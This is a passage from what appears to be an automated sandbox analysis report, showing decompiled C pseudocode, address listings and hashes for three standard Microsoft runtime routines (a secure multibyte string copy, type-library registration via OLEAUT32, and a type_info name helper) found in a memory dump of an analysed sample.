						_t65 = L00992F70(_t116);
						_t131 = 0x16;
						_push(0);
						_push(0x1e);
						L6:
						_push(_t128);
						_push(L"_mbsnbcpy_s_l");
						_push(_t110);
						 *_t65 = _t131;
						E00992900();
						L7:
						return _t131;
					}
					L10:
					_t132 = _a8;
					__eflags = _t132;
					if(__eflags == 0) {
						goto L3;
					}
					__eflags = _t109;
					if(_t109 != 0) {
						__eflags = _a12 - _t63;
						if(_a12 != _t63) {
							L00976CC0(_t109,  &_v28, _t132, _a20);
							_t69 = _v20;
							__eflags =  *(_t69 + 8);
							if( *(_t69 + 8) != 0) {
								_t118 = _t132;
								_t121 = _t127;
								_v8 = _t118;
								__eflags = _t109 - 0xffffffff;
								if(_t109 != 0xffffffff) {
									_t133 = _a12;
									while(1) {
										_t70 =  *_t133;
										 *_t121 = _t70;
										_t121 = _t121 + 1;
										_t133 = _t133 + 1;
										__eflags = _t70;
										if(_t70 == 0) {
											break;
										}
										_t118 = _t118 - 1;
										__eflags = _t118;
										if(_t118 == 0) {
											break;
										}
										_t109 = _t109 - 1;
										__eflags = _t109;
										if(_t109 != 0) {
											continue;
										}
										break;
									}
									_a12 = _t133;
									_t132 = _a8;
									_v8 = _t118;
									__eflags = _t109;
									if(_t109 == 0) {
										 *_t121 = 0;
										_t121 = _t121 + 1;
										__eflags = _t121;
									}
									L41:
									__eflags = _t118;
									if(_t118 != 0) {
										__eflags = _t121 - _t127 - 2;
										if(_t121 - _t127 < 2) {
											L79:
											_t111 = _v12;
											L80:
											__eflags = _t132 - 0xffffffff;
											if(_t132 != 0xffffffff) {
												__eflags = _t132 - 0x7fffffff;
												if(_t132 != 0x7fffffff) {
													__eflags = _t132 - _t118 + 1 - _t132;
													if(_t132 - _t118 + 1 < _t132) {
														_t77 = E009A50C0();
														_t118 = _v8;
														_t122 = _t118 - 1;
														__eflags = _t77 - _t122;
														if(_t77 >= _t122) {
															_t77 = _t122;
														}
														__eflags = _t132 + 1 + _t127 - _t118;
														E0095AF80(_t127 - _t118, _t132 + 1 + _t127 - _t118, 0xfe, _t77);
													}
												}
											}
											__eflags = _t111;
											if(_t111 == 0) {
												_t131 = 0;
												__eflags = 0;
												goto L89;
											} else {
												L87:
												_t73 = L00992F70(_t118);
												_t131 = 0x2a;
												 *_t73 = _t131;
												L89:
												__eflags = _v16;
												if(_v16 != 0) {
													 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
												}
												goto L7;
											}
										}
										_t112 = _t121 - 2;
										_t123 = _t112;
										__eflags = _t112 - _t127;
										if(_t112 < _t127) {
											L77:
											_t82 = _t112 - _t123;
											__eflags = _t82 & 0x00000001;
											if((_t82 & 0x00000001) == 0) {
												goto L79;
											}
											 *_t112 = 0;
											_t118 = _t118 + 1;
											_v8 = _t118;
											_t111 = 1;
											goto L80;
										}
										_t134 = _v20;
										while(1) {
											_t83 =  *_t123 & 0x000000ff;
											__eflags =  *(_t83 + _t134 + 0x19) & 0x00000004;
											if(( *(_t83 + _t134 + 0x19) & 0x00000004) == 0) {
												break;
											}
											_t123 = _t123 - 1;
											__eflags = _t123 - _t127;
											if(_t123 >= _t127) {
												continue;
											}
											break;
										}
										_t132 = _a8;
										goto L77;
									}
									__eflags =  *_a12 - _t118;
									if( *_a12 == _t118) {
										L44:
										_t124 = _t121 - 1;
										_t118 = _t124;
										__eflags = _t124 - _t127;
										if(_t124 < _t127) {
											L49:
											_t86 = _t124 - _t118;
											__eflags = _t86 & 0x00000001;
											if((_t86 & 0x00000001) == 0) {
												L51:
												__eflags = _t109 - 0xffffffff;
												if(_t109 != 0xffffffff) {
													 *_t127 = 0;
													__eflags = _t132 - 0xffffffff;
													if(__eflags != 0) {
														__eflags = _t132 - 0x7fffffff;
														if(__eflags != 0) {
															__eflags = _t132 - 1;
															if(__eflags > 0) {
																_t90 = E009A50C0();
																_t135 = _t132 - 1;
																__eflags = _t90 - _t135;
																if(_t90 >= _t135) {
																	_t90 = _t135;
																}
																E0095AF80(_t127, _t127 + 1, 0xfe, _t90);
																_t139 = _t139 + 0xc;
															}
														}
													}
													_t130 = L"minkernel\\crts\\ucrt\\src\\desktopcrt\\mbstring\\mbsncpy_s.inl";
													_t87 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\desktopcrt\\mbstring\\mbsncpy_s.inl", 0xae, 0, L"%ls", L"(L\"Buffer is too small\" && 0)");
													__eflags = _t87 - 1;
													if(_t87 == 1) {
														asm("int3");
													}
													_t88 = L00992F70(_t118);
													_t131 = 0x22;
													 *_t88 = _t131;
													E00992900(L"(L\"Buffer is too small\" && 0)", L"_mbsnbcpy_s_l", _t130, 0xae, 0);
													goto L89;
												}
												__eflags = _t132 - 1;
												if(_t132 <= 1) {
													L60:
													 *((char*)(_t127 + _t132 - 1)) = 0;
													L61:
													_t131 = 0x50;
													goto L89;
												}
												_t126 = _t132 - 2 + _t127;
												_t120 = _t126;
												__eflags = _t126 - _t127;
												if(_t126 < _t127) {
													L57:
													_t94 = _t126 - _t120;
													__eflags = _t94 & 0x00000001;
													if((_t94 & 0x00000001) == 0) {
														goto L60;
													}
													 *_t126 = 0;
													_t95 = E009A50C0();
													__eflags = _t95;
													if(_t95 != 0) {
														 *((char*)(_t127 + _t132 - 1)) = 0xfe;
													}
													goto L61;
												}
												_t115 = _v20;
												while(1) {
													_t96 =  *_t120 & 0x000000ff;
													__eflags =  *(_t96 + _t115 + 0x19) & 0x00000004;
													if(( *(_t96 + _t115 + 0x19) & 0x00000004) == 0) {
														goto L57;
													}
													_t120 = _t120 - 1;
													__eflags = _t120 - _t127;
													if(_t120 >= _t127) {
														continue;
													}
													goto L57;
												}
												goto L57;
											}
											 *_t124 = 0;
											goto L87;
										}
										_t136 = _v20;
										while(1) {
											_t97 =  *_t118 & 0x000000ff;
											__eflags =  *(_t97 + _t136 + 0x19) & 0x00000004;
											if(( *(_t97 + _t136 + 0x19) & 0x00000004) == 0) {
												break;
											}
											_t118 = _t118 - 1;
											__eflags = _t118 - _t127;
											if(_t118 >= _t127) {
												continue;
											}
											break;
										}
										_t132 = _a8;
										goto L49;
									}
									__eflags = _t109 - 1;
									if(_t109 != 1) {
										goto L51;
									}
									goto L44;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t99 =  *_a12;
									 *_t121 = _t99;
									_t121 = _t121 + 1;
									_a12 = _a12 + 1;
									__eflags = _t99;
									if(_t99 == 0) {
										goto L41;
									}
									_t118 = _t118 - 1;
									__eflags = _t118;
									_v8 = _t118;
									if(_t118 != 0) {
										continue;
									}
									goto L41;
								}
								goto L41;
							}
							_t131 = E009C09A0(_t127, _t132, _a12, _t109);
							goto L89;
						}
						 *_t127 = _t63;
						__eflags = _t132 - 0xffffffff;
						if(__eflags != 0) {
							__eflags = _t132 - 0x7fffffff;
							if(__eflags != 0) {
								__eflags = _t132 - 1;
								if(__eflags > 0) {
									_t102 = E009A50C0();
									_t137 = _t132 - 1;
									__eflags = _t102 - _t137;
									if(_t102 >= _t137) {
										_t102 = _t137;
									}
									E0095AF80(_t127, _t127 + 1, 0xfe, _t102);
									_t139 = _t139 + 0xc;
									_t63 = 0;
									__eflags = 0;
								}
							}
						}
						_t110 = L"(((_Src))) != NULL";
						_t128 = L"minkernel\\crts\\ucrt\\src\\desktopcrt\\mbstring\\mbsncpy_s.inl";
						_t101 = L00994930(__eflags, 2, _t128, 0x26, _t63, L"%ls", _t110);
						__eflags = _t101 - 1;
						if(_t101 == 1) {
							asm("int3");
						}
						_t65 = L00992F70(_t116);
						_t131 = 0x16;
						_push(0);
						_push(0x26);
						goto L6;
					} else {
						 *_t127 = _t63;
						__eflags = _t132 - 0xffffffff;
						if(_t132 != 0xffffffff) {
							__eflags = _t132 - 0x7fffffff;
							if(_t132 != 0x7fffffff) {
								__eflags = _t132 - 1;
								if(_t132 > 1) {
									_t106 = E009A50C0();
									_t138 = _t132 - 1;
									__eflags = _t106 - _t138;
									if(_t106 >= _t138) {
										_t106 = _t138;
									}
									E0095AF80(_t127, _t127 + 1, 0xfe, _t106);
								}
							}
						}
						L18:
						return 0;
					}
				}
				if(_t127 != 0) {
					goto L10;
				}
				_t149 = _a8;
				if(_a8 == 0) {
					goto L18;
				}
				goto L3;
			}























































                      0x009ac35f
                      0x009ac368
                      0x009ac36b
                      0x009ac36d
                      0x009ac372
                      0x009ac377
                      0x009ac3d0
                      0x009ac3d2
                      0x009ac386
                      0x009ac386
                      0x009ac38b
                      0x009ac3a7
                      0x009ac3a9
                      0x009ac3a9
                      0x009ac3aa
                      0x009ac3b1
                      0x009ac3b2
                      0x009ac3b4
                      0x009ac3b6
                      0x009ac3b6
                      0x009ac3b7
                      0x009ac3bc
                      0x009ac3bd
                      0x009ac3bf
                      0x009ac3c7
                      0x00000000
                      0x009ac3c7
                      0x009ac3d4
                      0x009ac3d4
                      0x009ac3d7
                      0x009ac3d9
                      0x00000000
                      0x00000000
                      0x009ac3db
                      0x009ac3dd
                      0x009ac415
                      0x009ac418
                      0x009ac489
                      0x009ac48e
                      0x009ac491
                      0x009ac495
                      0x009ac4ac
                      0x009ac4ae
                      0x009ac4b0
                      0x009ac4b3
                      0x009ac4b6
                      0x009ac4d1
                      0x009ac4d4
                      0x009ac4d4
                      0x009ac4d6
                      0x009ac4d8
                      0x009ac4d9
                      0x009ac4da
                      0x009ac4dc
                      0x00000000
                      0x00000000
                      0x009ac4de
                      0x009ac4de
                      0x009ac4e1
                      0x00000000
                      0x00000000
                      0x009ac4e3
                      0x009ac4e3
                      0x009ac4e6
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009ac4e6
                      0x009ac4e8
                      0x009ac4eb
                      0x009ac4ee
                      0x009ac4f1
                      0x009ac4f3
                      0x009ac4f5
                      0x009ac4f8
                      0x009ac4f8
                      0x009ac4f8
                      0x009ac4f9
                      0x009ac4f9
                      0x009ac4fb
                      0x009ac60e
                      0x009ac611
                      0x009ac645
                      0x009ac645
                      0x009ac648
                      0x009ac648
                      0x009ac64b
                      0x009ac64d
                      0x009ac653
                      0x009ac65a
                      0x009ac65c
                      0x009ac65e
                      0x009ac663
                      0x009ac666
                      0x009ac669
                      0x009ac66b
                      0x009ac66d
                      0x009ac66d
                      0x009ac675
                      0x009ac67d
                      0x009ac682
                      0x009ac65c
                      0x009ac653
                      0x009ac685
                      0x009ac687
                      0x009ac695
                      0x009ac695
                      0x00000000
                      0x009ac689
                      0x009ac689
                      0x009ac689
                      0x009ac690
                      0x009ac691
                      0x009ac697
                      0x009ac697
                      0x009ac69b
                      0x009ac6a4
                      0x009ac6a4
                      0x00000000
                      0x009ac69b
                      0x009ac687
                      0x009ac613
                      0x009ac616
                      0x009ac618
                      0x009ac61a
                      0x009ac631
                      0x009ac633
                      0x009ac635
                      0x009ac637
                      0x00000000
                      0x00000000
                      0x009ac639
                      0x009ac63c
                      0x009ac63f
                      0x009ac642
                      0x00000000
                      0x009ac642
                      0x009ac61c
                      0x009ac61f
                      0x009ac61f
                      0x009ac622
                      0x009ac627
                      0x00000000
                      0x00000000
                      0x009ac629
                      0x009ac62a
                      0x009ac62c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009ac62c
                      0x009ac62e
                      0x00000000
                      0x009ac62e
                      0x009ac504
                      0x009ac506
                      0x009ac50d
                      0x009ac50d
                      0x009ac50e
                      0x009ac510
                      0x009ac512
                      0x009ac529
                      0x009ac52b
                      0x009ac52d
                      0x009ac52f
                      0x009ac539
                      0x009ac539
                      0x009ac53c
                      0x009ac58a
                      0x009ac58c
                      0x009ac58f
                      0x009ac591
                      0x009ac597
                      0x009ac599
                      0x009ac59c
                      0x009ac59e
                      0x009ac5a3
                      0x009ac5a4
                      0x009ac5a6
                      0x009ac5a8
                      0x009ac5a8
                      0x009ac5b4
                      0x009ac5b9
                      0x009ac5b9
                      0x009ac59c
                      0x009ac597
                      0x009ac5cc
                      0x009ac5d4
                      0x009ac5dc
                      0x009ac5df
                      0x009ac5e1
                      0x009ac5e1
                      0x009ac5e2
                      0x009ac5e9
                      0x009ac5fb
                      0x009ac5fd
                      0x00000000
                      0x009ac602
                      0x009ac53e
                      0x009ac541
                      0x009ac57b
                      0x009ac57b
                      0x009ac580
                      0x009ac582
                      0x00000000
                      0x009ac582
                      0x009ac546
                      0x009ac548
                      0x009ac54a
                      0x009ac54c
                      0x009ac560
                      0x009ac562
                      0x009ac564
                      0x009ac566
                      0x00000000
                      0x00000000
                      0x009ac568
                      0x009ac56b
                      0x009ac570
                      0x009ac572
                      0x009ac574
                      0x009ac574
                      0x00000000
                      0x009ac572
                      0x009ac54e
                      0x009ac551
                      0x009ac551
                      0x009ac554
                      0x009ac559
                      0x00000000
                      0x00000000
                      0x009ac55b
                      0x009ac55c
                      0x009ac55e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009ac55e
                      0x00000000
                      0x009ac551
                      0x009ac531
                      0x00000000
                      0x009ac531
                      0x009ac514
                      0x009ac517
                      0x009ac517
                      0x009ac51a
                      0x009ac51f
                      0x00000000
                      0x00000000
                      0x009ac521
                      0x009ac522
                      0x009ac524
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009ac524
                      0x009ac526
                      0x00000000
                      0x009ac526
                      0x009ac508
                      0x009ac50b
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009ac4b8
                      0x009ac4b8
                      0x009ac4bb
                      0x009ac4bd
                      0x009ac4bf
                      0x009ac4c0
                      0x009ac4c3
                      0x009ac4c5
                      0x00000000
                      0x00000000
                      0x009ac4c7
                      0x009ac4c7
                      0x009ac4ca
                      0x009ac4cd
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009ac4cf
                      0x00000000
                      0x009ac4b8
                      0x009ac4a5
                      0x00000000
                      0x009ac4a5
                      0x009ac41a
                      0x009ac41c
                      0x009ac41f
                      0x009ac421
                      0x009ac427
                      0x009ac429
                      0x009ac42c
                      0x009ac42e
                      0x009ac433
                      0x009ac434
                      0x009ac436
                      0x009ac438
                      0x009ac438
                      0x009ac444
                      0x009ac449
                      0x009ac44c
                      0x009ac44c
                      0x009ac44c
                      0x009ac42c
                      0x009ac427
                      0x009ac44e
                      0x009ac453
                      0x009ac464
                      0x009ac46c
                      0x009ac46f
                      0x009ac471
                      0x009ac471
                      0x009ac472
                      0x009ac479
                      0x009ac47a
                      0x009ac47c
                      0x00000000
                      0x009ac3df
                      0x009ac3df
                      0x009ac3e1
                      0x009ac3e4
                      0x009ac3e6
                      0x009ac3ec
                      0x009ac3ee
                      0x009ac3f1
                      0x009ac3f3
                      0x009ac3f8
                      0x009ac3f9
                      0x009ac3fb
                      0x009ac3fd
                      0x009ac3fd
                      0x009ac409
                      0x009ac40e
                      0x009ac3f1
                      0x009ac3ec
                      0x009ac411
                      0x00000000
                      0x009ac411
                      0x009ac3dd
                      0x009ac37b
                      0x00000000
                      0x00000000
                      0x009ac37d
                      0x009ac380
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __wcstombs_l
                      • String ID: %ls$(((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$_mbsnbcpy_s_l$minkernel\crts\ucrt\src\desktopcrt\mbstring\mbsncpy_s.inl
                      • API String ID: 3007373345-974215673
                      • Opcode ID: 93cf4cce85402fe004ae1eb8bd3690e22b4db66f294728211b6b7dae680b61f6
                      • Instruction ID: a1d5456c933b54597f7a9900efe60634aade84ac6e45540c5a5e1537b2a0b305
                      • Opcode Fuzzy Hash: 93cf4cce85402fe004ae1eb8bd3690e22b4db66f294728211b6b7dae680b61f6
                      • Instruction Fuzzy Hash: C4A19BF1E043576BCF21AA2C4C45B7E7B9D9B87728F284665F864AF2D2D6719C0087D0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0094B3D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 178libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 90%
                      			E0094B3D0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v16;
				char _v28;
				intOrPtr _v36;
				signed int _v40;
				char _v564;
				char _v576;
				signed int _v584;
				signed int _v589;
				struct HINSTANCE__* _v600;
				intOrPtr _v604;
				signed int _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				void* _v620;
				signed int _t72;
				void* _t76;
				intOrPtr _t82;
				void* _t84;
				void* _t89;
				void* _t98;
				struct HINSTANCE__* _t101;
				_Unknown_base(*)()* _t103;
				signed char _t108;
				intOrPtr* _t152;
				void* _t154;
				void* _t160;
				void* _t161;
				signed int _t165;
				void* _t166;
				void* _t167;

				_t162 = __esi;
				_t120 = __ebx;
				_t160 =  &_v620;
				memset(_t160, 0xcccccccc, 0x9a << 2);
				_t167 = _t166 + 0xc;
				_t161 = _t160 + 0x9a;
				_t72 =  *0xa0600c; // 0x5d529087
				_v8 = _t72 ^ _t165;
				E00942ED0( &_v16);
				E0094E6E0( &_v28);
				_t76 = E0094E760( &_v28);
				_v36 = E0094A1D0(__ebx, _a4, _a8, L00942F40( &_v16), _t76);
				if(_v36 < 0) {
					L18:
					_v616 = _v36;
					E00946450( &_v28, __eflags);
					E009430B0( &_v16, _t162);
					_t82 = _v616;
					L19:
					E009D14C0(_t165, 0x94b68c);
					_t84 = _t82;
					_t154 = _t152;
					return E009D1520(E00957280(_t84, _t120, _v8 ^ _t165, _t154, _t161, _t162), _t165 - _t167 + 0x268);
				}
				_v40 = 0;
				E00942ED0( &_v576);
				_v620 = E0094E710( &_v28);
				_t89 = L00942F40( &_v576);
				_t162 = _t167;
				_t152 =  *((intOrPtr*)( *_v620 + 0x24));
				_v36 = E009D1520( *_t152(_v620, 0xffffffff, 0, 0, 0, _t89), _t167 - _t167);
				_t172 = _v36;
				if(_v36 >= 0) {
					_t108 = E00943000( &_v576, _t172, 0);
					_t173 = _t108 & 0x000000ff;
					if((_t108 & 0x000000ff) != 0) {
						E00942720(__ebx, _t161, _t162, _t173,  &_v564, 0x104, _v576, E00942EF0( &_v576, _t162));
						_t167 = _t167 + 0x10;
						_v604 = 0x206;
						if(_v604 >= 0x208) {
							E00957730();
						}
						 *((short*)(_t165 + _v604 - 0x230)) = 0;
						_v608 = E009CFE00(_t162,  &_v564) << 1;
						if(_v608 >= 0x208) {
							E00957730();
						}
						 *((short*)(_t165 + _v608 - 0x230)) = 0;
						_t152 = 0;
						_v40 = _t165 + 0xfffffffffffffdd0;
					}
				}
				_v584 = 0;
				_v589 = 0;
				_v36 = E0094A1A0( &_v589);
				_t177 = _v36;
				if(_v36 >= 0) {
					__eflags = (_v589 & 0x000000ff) - 1;
					if((_v589 & 0x000000ff) == 1) {
						_t101 = GetModuleHandleW(L"OLEAUT32.DLL");
						__eflags = _t167 - _t167;
						_v600 = E009D1520(_t101, _t167 - _t167);
						__eflags = _v600;
						if(_v600 != 0) {
							_t103 = GetProcAddress(_v600, "RegisterTypeLibForUser");
							__eflags = _t167 - _t167;
							_v584 = E009D1520(_t103, _t167 - _t167);
						}
					}
					__eflags = _v584;
					if(_v584 == 0) {
						_t152 = __imp__#163;
						_v584 = _t152;
					}
					_t162 = _t167;
					_t98 = _v584(E0094E7B0( &_v28), L00942F30( &_v16), _v40);
					__eflags = _t167 - _t167;
					_v36 = E009D1520(_t98, _t167 - _t167);
					E009430B0( &_v576, _t167);
					goto L18;
				}
				_t152 = _v36;
				_v612 = _t152;
				E009430B0( &_v576, _t162);
				E00946450( &_v28, _t177);
				E009430B0( &_v16, _t162);
				_t82 = _v612;
				goto L19;
			}


































                      0x0094b3d0
                      0x0094b3d0
                      0x0094b3db
                      0x0094b3eb
                      0x0094b3eb
                      0x0094b3eb
                      0x0094b3ed
                      0x0094b3f4
                      0x0094b3fa
                      0x0094b402
                      0x0094b40a
                      0x0094b426
                      0x0094b42d
                      0x0094b63a
                      0x0094b63d
                      0x0094b646
                      0x0094b64e
                      0x0094b653
                      0x0094b659
                      0x0094b663
                      0x0094b668
                      0x0094b669
                      0x0094b686
                      0x0094b686
                      0x0094b433
                      0x0094b440
                      0x0094b44d
                      0x0094b459
                      0x0094b45e
                      0x0094b478
                      0x0094b484
                      0x0094b487
                      0x0094b48b
                      0x0094b499
                      0x0094b4a1
                      0x0094b4a3
                      0x0094b4c8
                      0x0094b4cd
                      0x0094b4db
                      0x0094b4eb
                      0x0094b4ef
                      0x0094b4ef
                      0x0094b4fc
                      0x0094b512
                      0x0094b522
                      0x0094b526
                      0x0094b526
                      0x0094b533
                      0x0094b540
                      0x0094b54a
                      0x0094b54a
                      0x0094b4a3
                      0x0094b54d
                      0x0094b557
                      0x0094b56a
                      0x0094b56d
                      0x0094b571
                      0x0094b5a9
                      0x0094b5ac
                      0x0094b5b5
                      0x0094b5bb
                      0x0094b5c2
                      0x0094b5c8
                      0x0094b5cf
                      0x0094b5df
                      0x0094b5e5
                      0x0094b5ec
                      0x0094b5ec
                      0x0094b5cf
                      0x0094b5f2
                      0x0094b5f9
                      0x0094b5fb
                      0x0094b601
                      0x0094b601
                      0x0094b607
                      0x0094b61f
                      0x0094b625
                      0x0094b62c
                      0x0094b635
                      0x00000000
                      0x0094b635
                      0x0094b573
                      0x0094b576
                      0x0094b582
                      0x0094b58a
                      0x0094b592
                      0x0094b597
                      0x00000000

                      APIs
                      • ~Module.VCCORLIBD ref: 0094B58A
                      • GetModuleHandleW.KERNEL32(OLEAUT32.DLL,00000000), ref: 0094B5B5
                      • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 0094B5DF
                        • Part of subcall function 00942EF0: SysStringLen.OLEAUT32 ref: 00942F07
                        • Part of subcall function 00942720: __wcstombs_l.LIBCMTD ref: 00942733
                      • ~Module.VCCORLIBD ref: 0094B646
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0094B663
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Module$AddressCheckHandleProcStackStringVars@8__wcstombs_l
                      • String ID: OLEAUT32.DLL$RegisterTypeLibForUser
                      • API String ID: 1622416431-2666564778
                      • Opcode ID: c7265341d025c3c4277590cd785b0be0e84d70cdeb4f46fa053b93efcde82032
                      • Instruction ID: 74fcc6131246e847b564ff553720b515605bdfce504d486cdc624fd981f1080d
                      • Opcode Fuzzy Hash: c7265341d025c3c4277590cd785b0be0e84d70cdeb4f46fa053b93efcde82032
                      • Instruction Fuzzy Hash: 70715F719102289FCB24EB64DC59BEEB774BF94300F5042A9E50AB7291DB359E84CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0095C270 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 148COMMON
                      Download Yara Rule
                      C-Code - Quality: 95%
                      			E0095C270(intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				char _v6;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;

				_v32 = L0095BF40(_a4);
				if(_v32 == 0) {
					_v44 = E0095C030( &_v5);
					_v48 = E0095C020( &_v6);
					L0095BF60( &_v12, E0096AC70(0, _a4 + 5, 0, _v48, _v44, 0x2800));
					if((L0095BFE0( &_v12) & 0x000000ff) != 0) {
						_v16 = E00992E00(E0095C0C0( &_v12));
						while(_v16 != 0 &&  *((char*)(E0095C0C0( &_v12) + _v16 - 1)) == 0x20) {
							 *((char*)(E0095C0C0( &_v12) + _v16 - 1)) = 0;
							_v16 = _v16 - 1;
						}
						_v36 = _v16 + 1;
						_v56 = _v36 + 4;
						E0095BF80( &_v20, E00999580(_v56, 2, "d:\\a01\\_work\\38\\s\\src\\vctools\\crt\\vcruntime\\src\\eh\\std_type_info.cpp", 0x66));
						if((E0095C000( &_v20) & 0x000000ff) != 0) {
							_v24 = E0095C0D0( &_v20);
							_v28 = _v24 + 4;
							_v64 = 0;
							 *_v24 = _v64;
							E00992DE0(_v28, _v36, E0095C0C0( &_v12));
							_v40 = L0095BF20(_a4, _v28, 0);
							if(_v40 == 0) {
								E0095C090( &_v20);
								__imp__InterlockedPushEntrySList(_a8, _v24);
								_v72 = _v28;
								E0095BFC0( &_v20);
								E0095BFA0( &_v12);
								return _v72;
							}
							_v68 = _v40;
							E0095BFC0( &_v20);
							E0095BFA0( &_v12);
							return _v68;
						}
						_v60 = 0;
						E0095BFC0( &_v20);
						E0095BFA0( &_v12);
						return _v60;
					}
					_v52 = 0;
					E0095BFA0( &_v12);
					return _v52;
				}
				return _v32;
			}





















                      0x0095c282
                      0x0095c289
                      0x0095c29b
                      0x0095c2a6
                      0x0095c2cd
                      0x0095c2df
                      0x0095c309
                      0x0095c30c
                      0x0095c332
                      0x0095c33d
                      0x0095c33d
                      0x0095c348
                      0x0095c351
                      0x0095c36d
                      0x0095c37f
                      0x0095c3a8
                      0x0095c3b1
                      0x0095c3b6
                      0x0095c3bf
                      0x0095c3d2
                      0x0095c3ec
                      0x0095c3f3
                      0x0095c413
                      0x0095c420
                      0x0095c429
                      0x0095c42f
                      0x0095c437
                      0x00000000
                      0x0095c43c
                      0x0095c3f8
                      0x0095c3fe
                      0x0095c406
                      0x00000000
                      0x0095c40b
                      0x0095c381
                      0x0095c38b
                      0x0095c393
                      0x00000000
                      0x0095c398
                      0x0095c2e1
                      0x0095c2eb
                      0x00000000
                      0x0095c2f0
                      0x00000000

                      APIs
                      Strings
                      • d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\eh\std_type_info.cpp, xrefs: 0095C356
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name___un
                      • String ID: d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\eh\std_type_info.cpp
                      • API String ID: 3905892445-4032652797
                      • Opcode ID: 441f38bee04eed8513f7845c7e12ec03f30b31ab5e3050fd2ab236c27af5e4e1
                      • Instruction ID: 38c2ca069c9c5dbde5fb6eec92279621074942ff0b563ee54949b118750dc4fb
                      • Opcode Fuzzy Hash: 441f38bee04eed8513f7845c7e12ec03f30b31ab5e3050fd2ab236c27af5e4e1
                      • Instruction Fuzzy Hash: DD510BB1D00208AFDF08EFA5D891BEEB7B4AF94305F404469F81277291EB356A49CF90
                      Uniqueness

                      Uniqueness Score: -1.00%

